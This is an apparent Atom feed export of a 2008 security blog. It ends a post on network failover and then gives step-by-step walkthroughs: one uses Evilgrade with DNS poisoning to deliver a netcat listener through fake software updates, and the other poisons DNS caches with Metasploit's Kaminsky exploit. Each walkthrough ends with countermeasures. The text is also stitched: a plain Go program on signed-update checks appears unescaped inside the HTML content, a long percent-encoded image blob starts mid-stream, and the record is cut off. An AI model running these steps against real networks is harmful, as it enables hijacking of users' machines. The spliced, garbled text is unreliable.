This is especially good in a security situation where one device is the victim of an  attack.&lt;br /&gt;&lt;br /&gt;A configuration example of Failover for the ASA can be found &lt;a href="http://www.cisco.com/en/US/products/hw/vpndevc/ps2030/products_configuration_example09186a00807dac5f.shtml"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.cisco.com/en/US/products/hw/vpndevc/ps2030/products_configuration_example09186a00807dac5f.shtml"&gt;&lt;/a&gt;&lt;br /&gt;A good configuration example of HSRP in Cisco routers is &lt;a href="http://www.cisco.com/en/US/docs/internetworking/case/studies/cs009.html"&gt;here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Floating Static Routes&lt;/span&gt; are hard coded second path routes. When a dynamic or static route fails it will pick up the hard coded route and route all traffic through that circuit. This is good backup when a circuit fails. Failover is accomplished by adding a static route to the system with an extremely high administrative distance for example.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ip route&lt;/span&gt; &lt;b&gt;192.168.4.0 255.255.255.0 172.16.4.1 175&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;The administrative distance of 175 prevents it from picking this route until one with a lower administrative distance has failed. Since most people use EIGRP or OSPF an administrative distance of 175 is much higher than the 90 for EIGRP and the 110 for OSPF. This means the routing protocol must fail and then it will use the static route.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Mesh Connectivity&lt;/span&gt; is a type of connectivity that each circuit has multiple connections to other devices. 
This allows dynamic routing protocols to route around failures and is especially important in backbones to make them failure-resistant.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Out of Band Management&lt;/span&gt; allows you to have complete control of your devices without having to use the data connections. Cisco has the ability to do this kind of connectivity with a router acting as a terminal server and connecting that router to the console ports of all other Cisco devices using an octal cable. This connectivity can be done over telnet or SSH. SSH makes this one of the most secure and foolproof ways to access a Cisco device when a failure has occurred.&lt;br /&gt;&lt;br /&gt;To get a good example look &lt;a href="http://etherealmind.com/2008/05/29/cisco-ios-reverse-ssh-terminal-server-console-access/"&gt;here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;and &lt;a href="http://www.cisco.com/en/US/docs/ios/12_3t/12_3t11/feature/guide/gt_rssh.html#wp1047179"&gt;here.&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;This type of access can also be accomplished using a modem. This method can allow out of band management on devices that are not in your normal location. This is a great option and can improve the security of devices, because in-band management is not needed, which eliminates issues with management protocols like telnet, SSH and SNMP.&lt;br /&gt;&lt;br /&gt;In conclusion, a little thinking when designing your network can make for a much more secure and resilient network. 
This is especially important when your network is a converged network that runs VOIP and Video applications that require up time.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/522754168935527456-3131299971853826861?l=infosecsamurai.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/3131299971853826861/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=3131299971853826861' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/3131299971853826861'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/3131299971853826861'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/09/cia-security-triad-availability.html' title='The CIA Security Triad, Availability'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-1239225547409371022</id><published>2008-08-04T17:40:00.020-04:00</published><updated>2009-01-01T13:38:49.345-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='Arp Spoofing'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Evilgrade'/><category scheme='http://www.blogger.com/atom/ns#' term='Attack 
Tools'/><title type='text'>Evilgrade Will 0wn Us All</title><content type='html'>In today's post we are going to explore a very interesting type of man in the middle attack that allows a client side attack to occur through an unsigned automatic update process. This attack can happen through several different upgrade applications.  In this case the attack is very complex as it involves DNS cache poisoning using Kaminsky's DNS vulnerability or a man in the middle attack using Ettercap.&lt;br /&gt;&lt;br /&gt;The first tool we will use in this attack is the Metasploit framework and the Metasploit DNS attack called the bailiwicked attack. We talked about how to execute this attack in the last post. So lets start with that.&lt;br /&gt;&lt;br /&gt;First we have to make sure that the DNS server is vulnerable you can do this by using the check option in the exploit or doxpara.com. It is also important to run an nmap scan and make sure the server is an ISC Bind DNS server.&lt;br /&gt;&lt;br /&gt;Next we then want to poison one of the domain names that evilgrade uses. There are several different domains.  Probably the least noticable would be itunes.com or java.sun.com. 
The first stage of the attack is to use the bailiwicked domain attack and spoof java.sun.com to the IP address of our server which is hosting evilgrade.&lt;br /&gt;&lt;br /&gt;We then start evilgrade by executing evilgrade which will look like the following.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_IYfuPD9qO24/SKGYO0TNiCI/AAAAAAAAACw/9Lj-0xMJXSI/s1600-h/evilgrade.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_IYfuPD9qO24/SKGYO0TNiCI/AAAAAAAAACw/9Lj-0xMJXSI/s320/evilgrade.JPG" alt="" id="BLOGGER_PHOTO_ID_5233631622306039842" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Next we enter &lt;span style="font-weight: bold;"&gt;configure sunjava&lt;/span&gt; and then &lt;span style="font-weight: bold;"&gt;show options&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_IYfuPD9qO24/SKGdCkRm79I/AAAAAAAAAC4/LBwaaYXh9Uw/s1600-h/evilgrade2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_IYfuPD9qO24/SKGdCkRm79I/AAAAAAAAAC4/LBwaaYXh9Uw/s320/evilgrade2.jpg" alt="" id="BLOGGER_PHOTO_ID_5233636909404057554" border="0" /&gt;&lt;/a&gt;Then we get the screen above.&lt;br /&gt;&lt;br /&gt;Now we type &lt;span style="font-weight: bold;"&gt;set agent&lt;/span&gt; and the location of our payload. Like this&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;set agent /root/nclistener.exe&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center; font-weight: bold;"&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-weight: normal;"&gt;We can launch the attack now or change more of the settings using the set variable. 
After this we launch the attack by using the &lt;span style="font-weight: bold;"&gt;start&lt;/span&gt; command&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-weight: normal;"&gt;The next time the user's software checks for an update it will download our NetCat listener. Most users apply updates without looking, so you should at least own a PC or two from this.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt; &lt;a href="http://www.infobyte.com.ar/demo/evilgrade.htm"&gt;To see full details of this exploit, take a look at this video&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Countermeasures&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: normal;"&gt;To counter this attack we have to defend against the initial attack vector. To do this we must stop DNS spoofing, ARP spoofing and DHCP spoofing. Defending against these attacks entails patching your DNS servers and turning on DHCP snooping and ARP inspection on your switches.&lt;br /&gt;&lt;br /&gt;You can look at my previous posts to see how to turn on DHCP snooping and ARP inspection on Cisco Catalyst switches. 
Otherwise, make sure you patch your DNS servers as the DNS servers have the largest attack surface.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;
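The root cause that the countermeasures above work around is an updater that trusts whatever the resolved host serves. As an added example (not code from this post, from evilgrade or from any vendor's updater), the Go program below puts that behaviour beside a client that installs only when the update manifest verifies under a vendor key pinned into the client at build time; the manifest layout, the java.sun.com update URLs and the update bodies are constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Manifest is what the update server hands the client: which file to fetch
// and the expected SHA-256 of it. The layout is constructed for this example.
type Manifest struct {
	Version string
	URL     string
	SHA256  string // hex digest of the update body
}

// signedBytes is the canonical byte string the vendor signs.
func (m Manifest) signedBytes() []byte {
	return []byte(m.Version + "\n" + m.URL + "\n" + m.SHA256 + "\n")
}

func hexSHA256(body []byte) string {
	sum := sha256.Sum256(body)
	return hex.EncodeToString(sum[:])
}

// unsafeAccept models the updater behaviour evilgrade abuses: whichever host
// java.sun.com resolves to is trusted and whatever it serves gets installed.
func unsafeAccept(m Manifest, body []byte) bool {
	return true
}

// safeAccept installs only when the manifest verifies under the vendor key
// pinned into the client at build time and the body matches the manifest
// hash. A spoofed DNS answer then buys the attacker nothing: authenticity
// comes from the pinned key, not from where the bytes arrived from.
func safeAccept(pinned ed25519.PublicKey, m Manifest, sig []byte, body []byte) error {
	if !ed25519.Verify(pinned, m.signedBytes(), sig) {
		return errors.New("manifest signature invalid: refusing update")
	}
	if hexSHA256(body) != m.SHA256 {
		return errors.New("update body does not match manifest hash: refusing update")
	}
	return nil
}

// Scenario holds a genuine signed update and the substitute that someone who
// controls the DNS answer for the update host would serve in its place.
type Scenario struct {
	Pinned      ed25519.PublicKey
	Genuine     Manifest
	GenuineSig  []byte
	GenuineBody []byte
	Rogue       Manifest
	RogueSig    []byte // signed with the attacker's own key, not the vendor's
	RogueBody   []byte
}

// newScenario generates a vendor key and an attacker key and signs one
// manifest with each. Bodies, versions and URLs are constructed samples.
func newScenario() (Scenario, error) {
	vendorPub, vendorPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return Scenario{}, err
	}
	_, attackerPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return Scenario{}, err
	}
	genuineBody := []byte("genuine update body (constructed sample)")
	rogueBody := []byte("rogue update body (constructed sample)")
	genuine := Manifest{Version: "1.0.1", URL: "http://java.sun.com/update/1.0.1.bin", SHA256: hexSHA256(genuineBody)}
	rogue := Manifest{Version: "1.0.2", URL: "http://java.sun.com/update/1.0.2.bin", SHA256: hexSHA256(rogueBody)}
	return Scenario{
		Pinned:      vendorPub,
		Genuine:     genuine,
		GenuineSig:  ed25519.Sign(vendorPriv, genuine.signedBytes()),
		GenuineBody: genuineBody,
		Rogue:       rogue,
		RogueSig:    ed25519.Sign(attackerPriv, rogue.signedBytes()),
		RogueBody:   rogueBody,
	}, nil
}

func main() {
	s, err := newScenario()
	if err != nil {
		panic(err)
	}
	fmt.Println("unsafe client installs rogue update:", unsafeAccept(s.Rogue, s.RogueBody))
	fmt.Println("safe client, genuine update:", safeAccept(s.Pinned, s.Genuine, s.GenuineSig, s.GenuineBody))
	fmt.Println("safe client, rogue manifest and body:", safeAccept(s.Pinned, s.Rogue, s.RogueSig, s.RogueBody))
	// Replaying the genuine signed manifest with a swapped body trips the hash check.
	fmt.Println("safe client, genuine manifest, swapped body:", safeAccept(s.Pinned, s.Genuine, s.GenuineSig, s.RogueBody))
}
```

With both checks in place a poisoned answer for java.sun.com only lets the attacker serve something the client refuses, which is why signed updates, not DNS hygiene alone, close this hole.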
</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/1239225547409371022/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=1239225547409371022' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/1239225547409371022'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/1239225547409371022'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/08/why-upgrade-when-you-can-evilgrade.html' title='Evilgrade Will 0wn Us All'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_IYfuPD9qO24/SKGYO0TNiCI/AAAAAAAAACw/9Lj-0xMJXSI/s72-c/evilgrade.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-4101126199241816194</id><published>2008-07-28T18:55:00.031-04:00</published><updated>2009-01-01T13:37:55.741-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DNS'/><category scheme='http://www.blogger.com/atom/ns#'
term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Attack Tools'/><title type='text'>Bringing Balance to Kaminsky's DNS Poisoning Vulnerability</title><content type='html'>Ok, so the security community is abuzz about the DNS flaw that was found by Dan Kaminsky of IOActive. ISACA is having a special webcast about it. Internet Storm Center is running stories about it. People are scared, which I find funny, yet a healthy dose of paranoia in the security world is a good thing.&lt;br /&gt;&lt;br /&gt;In today's post we will be exploring just how easy it is to exploit the recent DNS flaw that was released by Dan Kaminsky. This will explain why you see security professionals running around like chickens with their heads cut off. This flaw essentially allows an attacker to overwrite an already-cached domain or host record in a caching DNS server. This is basically DNS cache poisoning, but done in a new way.&lt;br /&gt;&lt;br /&gt;For more information on how this works, look &lt;a href="http://news.cnet.com/8301-1009_3-9998906-83.html"&gt;here&lt;/a&gt; and &lt;a href="http://amd.co.at/dns.htm"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;p style="color: rgb(0, 0, 0); font-family: arial; text-align: left;"&gt;So how easy is this to exploit? 
Way too easy: if you follow the steps in this post you will be able to execute this attack.&lt;/p&gt;&lt;ol style="font-family: arial;"&gt;&lt;li&gt;Go to &lt;a href="http://metasploit.com/"&gt;metasploit.com&lt;/a&gt; and download Metasploit Framework 3.&lt;/li&gt;&lt;li&gt;Install it.&lt;/li&gt;&lt;li&gt;You will want to run svn update to get the latest exploits.&lt;/li&gt;&lt;li&gt;After the update runs, open msfgui; it should look like this:&lt;br /&gt;&lt;p style="color: rgb(0, 0, 136); text-align: left;"&gt;&lt;img style="width: 355px; height: 187px;" alt="metasploit.JPG" src="http://img182.imageshack.us/img182/1350/metasploitrn7.jpg" /&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;Type DNS in the search bar and hit Find. After a minute or two you will see DNS bailiwicked_host and DNS bailiwicked_domain.&lt;/li&gt;&lt;li&gt;Right-click on either of these exploits and choose Execute. This will bring up the MSF assistant, shown below. Fill in the fields, then hit Next and Start.&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_IYfuPD9qO24/SI-cSI-XukI/AAAAAAAAACg/Q3mSr_cHwJ8/s1600-h/msfassist.JPG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5228569527861099074" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="http://1.bp.blogspot.com/_IYfuPD9qO24/SI-cSI-XukI/AAAAAAAAACg/Q3mSr_cHwJ8/s320/msfassist.JPG" border="0" /&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="color: rgb(0, 0, 136); text-align: left;" align="left"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;The exploit tells you whether it succeeds. 
Just hope it fails if it's one you administer.&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span style="font-family:arial;"&gt;It's that easy: you just made everyone's www.yahoo.com resolve to your blog. See how elite you are :-P.&lt;br /&gt;&lt;br /&gt;The real danger is having this redirect a site to a client-side attack and then using that as a jump-off point for a serious compromise.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Countermeasures&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;In this instance it sucks to be a defender, which most of us are. Microsoft actually made it easy on us this time with a &lt;a href="http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx"&gt;patch&lt;/a&gt; that came out earlier this month. There are &lt;a href="http://www.isc.org/sw/bind/bind-security.php"&gt;updates&lt;/a&gt; for BIND as well. You can also turn off recursion or forward to &lt;a href="http://www.opendns.com/"&gt;OpenDNS&lt;/a&gt;. You can also check whether you are vulnerable &lt;a href="http://www.doxpara.com/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;The fix can still be undone by NAT routers and firewalls that act as DNS servers or intercept DNS traffic, namely Cisco routers acting as DNS servers. I don't know why you would use this function, but if you do, upgrade your IOS. The source ports are still an issue with all Cisco products as of this writing; please upgrade when patches are available.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;So now we have fully explored this attack and how to prevent it. I am sure that this post shows just how simple it is to be a script kiddie hacker and just how much trouble you can cause those of us in the security field. 
This is a great example of why Offensive Security is something that all security pros should learn. Learn the attacks, learn how to hack, so you can prevent them.&lt;br /&gt;
8i%A1%C3%81%93%1EJ%04%D0p%A2%C3%84%16%0F%12%CC%28%03PA%02%21%F9%04%05%05%04%2CN%0A0W%03%ECH%BA%BC%F3%A3%C9I%2B%85%D0%EA%7Dq%E6%E0%E6%7Da%29%8D%A4%A9%A2%A9Z%B2%91%BB%B2%B2%0B%D7%E6%8D%87p%BCs%BA%9F%28%28%B4%10%8B%1D%14r%A8%5CV%8ENF%2F%9A%1CQ%27%D3k%03z%E5%AA%04%60%81%91%B6%0B%87%9F%CD%9Ay%5D%C5%A8%D7%EC%B6%CF%04%AF%8F%1F%B2%BA%9D%AA%DF%3B%FB%7EH%80p%7C%83fQ%86%87%7F%89%60%85%8C%8E%86Z%89Z%0A%83%94%0B%80%97%0C%81%9A%95g%9D%A0%A1%A2%A3%A4%A5%A6%A7%A8%A9%AA*%01%AD%AE%AF%B0%B1%B05%B2%B5%B6%AF.%B7%BA%B6%AC%BB%BE%B8%26%BF%C2%01%BD%C3%BB%B9%C6%B7%B4%C9%B2%AB%CE%CF%D0%D1%D2%D3%D4%D52%D8%A5%D9%DC%A2%DC%DF%DA%9D%E0%DF%E2%E3%E4%94%E6%E3%E8%E9%E0Z%EC%ED%EE%EF%DD%F1%F2%D8%F4%F5%EB%F5%E1W%FA%FB%FC%F8%F9%D8%95K%17%8A%A0%B7s%A3%E6QH%21%F9%04%05%05%04%2CN%1F0W%03%E9H%BA%DC%FEn%C8%01%AB%BDmN%CC%3B%D1%A0%27F%608%8Eez%8A%A9%BAb%AD%FBV%B1%3C%93%B5v%D3%B9%BE%E3%3D%CA%2F%13%94%0C%81%BD%231%A8D%B6%9A%8F%1C%14R%9B%F2L%D6%AB0%CB%EDz%BF%E0%B0xL.%9B%CF%5C%81z%CDn%BB%DB%B3%B7%7C%CE%5E%D1%EF%F3%13%7E%0F%1F%F1%FF%02z%80%7Bv%83tq%86oh%8B%8C%8D%8E%8F%90%91%92%93%0A%01%96%01f%97%9Ac%9A%9D%98%60%9E%9D%A0%A1%A2%5D%A4%A1%A6%A7%9E%5C%AA%AB%AC%AD%9B%AF%B0%96%B2%B3%A9%B3%9FY%B8%B9%10%BE%2F%B8%15%BF%BF%C1%B0%BD%C4%C5%C6%A7%C8%C9%C07%CC%0F%CE%CA%D0%A5%D2%D3%CF%3B%B1%C3%D8b%D8%BE%DE%DDa%DF%D9_%DFc%E7%E3%E2%EA%D3%E1%EB%E6%EF%5E%E4%EE%CE%E8%F1%5D%E9%EC%F5%FA%FB%60%F9%FE%ED%E8%11%23%D3%CF%1E%B8%29%09%21%F9%04%05%05%04%2C%3C%3CBB%03%F9H%BA%DC%FEP%8DI%AB%BD6%EA%1D%B1%FF%15%27r%60%F9%8D%E8c%AEY%EAJl%FC%BE%B1%3C%BB%B5y%CF%F9%B9%FF%C0%A0pH%2C%1A%8F%C8%A4r%C9l%3A%9F%D0%A8tJ%10X%05%D4%D7u%9B%1Dm%BF%D8%AE%06%FC%15G%C8%60%B3%03MV3%D8mw%15%5E%96%CF%E9W%FB%1D%1Fv%F3%F3v%7FVz%82F%01%87%017%7FD%88%88%8AxC%8D%8D%3Bt%91%92%87%40l%96%97%89%99u%11%A1%1C%9C%98A%5C%1A%A2%A2%A4%A5O%AA%AA%1B%A5%A6L%AF%AB%B1%ADM%B5%A1%AC%B8K%BA%A3%BC%97%B9%BA%23%B2%B4%C4%22%C6%BE%C8%C9%BDH%BF%28%B2%9D%CF%CC%CD%9CJ%D0%D1%CAG%D9%DA%D7%D4%B5%2F%DBE%DD%DE%C2%DC%D5%E6%92%E8%E1%E2%E3B%E5%29%EFA%F1%F2%DFD%F5%EA%8E%E4%E9.%E7%FC%EDvLb%F7J%8F%83%7Cv%10%CAQ%E8%
86%A1%1A%87%0F%0B%1A%7Ckb%83%04%21%F9%04%05%05%04%2C%1FNW0%03%FFH%BA%DC%FE0%CA7%EA%988%EB%CD%89%FD%5D%28%8E%CDg%5Ed%AAJ%A7%B9%BE%B0%D7%BAq%1D%CE%AD%ADkx%BE%FF%90%DE%09Ht%08i%C5%E4%11%94%2C.-M%E5%13%15%05N5%80%2C%E0%27%E8%0AFO%8CV%AB%F3z%C1%C7%C9x%5C3%9BIB%F5%3A%DBvwU8%C9%9C%1C%B3%9F%F1H%10%7Bt%13%01%86%01%18%7Ew%2BL%11%83%5B%85%87%86%89%8AQ%8F%90%11%92%92%13%8A%8BE%8F%18%9A%87%94%7EI%97%A1%A2%88%9C%9D%9F%83%19%A9%AA%AB%A5%40%A0%AF%A9%1A%AC%3F%B5%A8%A2%B8%95%3B%BB%BC%9A%1B%B95%A7%1A%B0%C4%C50%C1%C2%9B%CA%B3%CC%CD%91%BD%D0%D1%2B%D3%D4%C3%1C%CB%29%D9%DA%CF%DC%BF*%DF%12%C9%1D%DD%22%E5%E6%B7%21%E9%1C%C7%1D%E7%E8%EFX%AE%22%F3%F4%D7%1D%F7%F8%ED%22%E3B%F4%0B%91O%9F%1BokR%144%E8%89%04%1B%85%FFF%BC%A9%E2l%14%C5%28%0B%2F%FE%C8%A8Q%13%07%C7%8E5%3E%82%84%21r%E4%8Bj%26%89%84K%A9%20%01%21%F9%04%05%05%04%2C%0ANW0%03%FFH%BA%DC%0E%10%B8I%AB%BD8%B7%C8%B5%FF%E0%C7%8DRh%9E%219%A2lK%A9%A4%2B%B7%B0%3A%DF%60m%E3%3C%A6%C7%BD%E0%E4%B7%12%1A%17%C4%CEq%99%8C%2C%8FM%C8%13%DA%9CR%89%A7%806%20%1Cx%07%99dv%AB%ED%7D%BF%3E%1D%8AL%C6%9D%CF%97Z%8B%BDu%BF%BDi%25%8B%5E%BF%DD%D1qN.%7Ce%17%02%87%02%18%7FxV%04%84%5C%86%88%87%8A%8BV%8F%90%15%92%92%17%8B%8CK%8F%18%9A%88%94%7FO%97%A1%A2%89%9C%9D%9F%84%19%A9%AA%AB%A5F%A0%AF%A9%1A%ACB%B5%A8%A2%B8%95A%BB%BC%9A%1E%B98%A7%1A%B0%C4%C53%C1%C2%9B%CA%B3%CC%CD%91%BD%D0%D1%83%AE%1F%C9%1F%CB%7B%D9%DA%B7%20%DDc%7C%21%DB%DC%BF%DE%E5%E6%E1%E2%E9%26%C7%20%E7%E8%EF%20%D3%C8%ED%EE%D7%F6%EB%26%F3%FAo%D6%F4cW%CDD%3D%7EmP%FC%03%E8I%60%21%85%F9%0C%02jDm%18E%2B%0B%2F%0A%C9%A8%B1%12%07%C7%8E8%3E%82%9C%21r%A4%8C%82%26%8D%3C%E3%91%21%F9%04%05%05%04%2C%02%3CBB%03%F5H%04%DC%FE%F0%A9I%AB%BD%98%C6%CD%5D%FE%E0%D5%8D%5Ch%82d*%9D%AC%A5%BE%40%2BO%B0%3A%DF%F5x%EF%F9%B6%FF%C0%A0pH%2C%1A%8F%C8%A4r%C9l%3A%9F%D0%A8tJ%3D%05%AE%81%AA%0C%CB%D5%9A%B8%E0%AC7%13%06%8F%2F%E5%F0%99%92.%AF%09m%F7%3A%AE%3E%D3%CD%F6%3B%F6%AD%DF%E7%FB%7C%80%81w%3B%02%86%02Fz%85%87%86Et%3F%8C%8CDmA%91%87%8Ex%40%96%97%98WC%9B%8D%20%03%A3%03R%A0%88%A2%A4%A3P%A7%A8%19%AA%AAO%A7%21%B0%A4N%AD%B4%B5%A5M%B3%B9%B5%BC%A0%27%BA%BBK%BD%B
E%B0L%C6%C7%B1J%B8%C2%BA%C5%C1%2C%C3%CD%CA%CB%B6I%D6%D7%ABH%DA%DB%C4F%DE%A9%BFG%E2%E3%C8%E1%E6%1F%D4%E9%9B%3B%ECE%D27%F0D%F23%F4%F5%91%40%F8%F9%A1%3F%FCo%26%0CH%60%60%40%83o%10%AEQx%86aCt%0410K%21%F9%04%05%05%04%2C%02%1F0W%03%E7H%BA%0C%0E%2C%CAIk%7B%CE%EAM%B1%E7%E0%E6%8Da%29%8D%A8%A9%A2%A9Z%B2%AD%CB%C1%B1%AC%D1%A4%7D%E3%98.%F2%0F%DF%0E%08%11v%88E%E3%04%A9%AC%9B%16%1C4%0A%9B%0E%7B%D6_%26%CB%EDz%BF%E0%B0xL.%9B%CF%A1%80z%CDn%BB%DB%B6%B7%7C%CEv%D1%EFs%15%7E%0F7%F1%FF%01z%80%7Bv%83tq%86oh%8B%8C%8D%8E%8F%90%91%92%93h%02%96%02f%97%9Ac%9A%9D%98%60%9E%9D_%A1%9E%5D%A4%A1Y%A7%A8V%AA%A5S%AD%A2%AF%B0%97%A9%B3%96%AC%B6%9F%B2%B3%5C%B62%03%C0%03%16%BC.%C1%C1%15%AD6%C6%C6%14%A7%3E%CB%C7%CD%B1%3A%D0%D1%D2%B7B%D5%C0b%DA%C2a%DD%DE%60%DD%DC%E3%DF%DA%E4%D5c%E5%E2%E7%E6%ED%EC%E9%EE%F1%F0%D0%E8%F5%F6%CB%F8%CC%F2%F7%F4%F9%FA%DB%D4%CD%D3wf%9F%86%04%21%F9%04%09%05%04%2C%02%02%7C%7C%03%FFH%BA%DC%FE0%CAI%AB%BD8%EB%CD%BB%FF%60%28%8Edi%9Eh%AA%AEl%EB%BEp%2C%CFt%0A%DC%40%AD%938%BE%FF%9E%5E%0FH%CC%08%7D%C5%24%E5%88T%3A%1D%CC%E6sJ%88%E6%A8X%2B%96%AA%DDN%BB%5E%A5%F5%1AN%82%CB%C41%DA%1C%5D%B3%99%EEt%3B%0E%3C%D3i%EA%BB%CE%AE%8F%E5%FB3%7C%80%12%01%85%01%21%82%83%0E%86%86%20%89%8A%0B%8C%92%1Fs%90%10%92%98%1D%95%96%8B%98%99%1BG%9C%11%9E%9E%1CC%A2%A3%A4%9F%A8%26%AA%A5%AC%AD%AE%93%B0%24%B2%B3%B4%23%B6%8C%B8%B5%BA%85%BC%22%BE%BF%C0%21%C2%C4%C1%B6%C7%B9%AE%CA%CB%A4%CD%BD%B7%D0%CE%87%D3%D6%D7%D8%D9%DA%DB%DC%DD%DE%DF%E0%E1%C0%02%E4%E5%E6%E7%E8%E7%DC%E9%EC%ED%E6%DA%EE%F1%ED%D9%F2%F5%EA%D8%F6%F9%02%F4%FA%F5%F0%FD%EE%D6%01L%27%AE%A0%C1%83%08%13*%5C%C8%B0%A1%C3%87h%06H%1Cq%C1%C4%8B%10%2Fj%A4%D8pP%A3F%86%1E7*%0C%E9%11%21%C9%92%07O%8A4%A8%F2%23%CB%96%13M%C2%94%98r%26%C7%970%13%CE%5C%98%93%E7I%87%24%2B%AE%ACH%23%D1%A3H%93*%5D%CA%B4%A9%D3%A7P%A3J%9DJ%B5%AA%D5%ABX%B3j%DD%CA%B5%AB%D7%AF%60%C3%16I%3B" /&gt;&lt;p id="greasedLightboxLoadingText"&gt;Loading image&lt;/p&gt;&lt;p id="greasedLightboxLoadingHelp"&gt;Click anywhere to cancel&lt;/p&gt;&lt;/div&gt;&lt;div id="greasedLightboxError"&gt;&lt;p 
</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/4101126199241816194/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=4101126199241816194' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/4101126199241816194'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/4101126199241816194'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/07/bringing-balance-to-kaminskys-dns.html' title='Bringing Balance to Kaminsky&apos;s DNS Poisoning Vulnerability'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_IYfuPD9qO24/SI-cSI-XukI/AAAAAAAAACg/Q3mSr_cHwJ8/s72-c/msfassist.JPG' height='72' 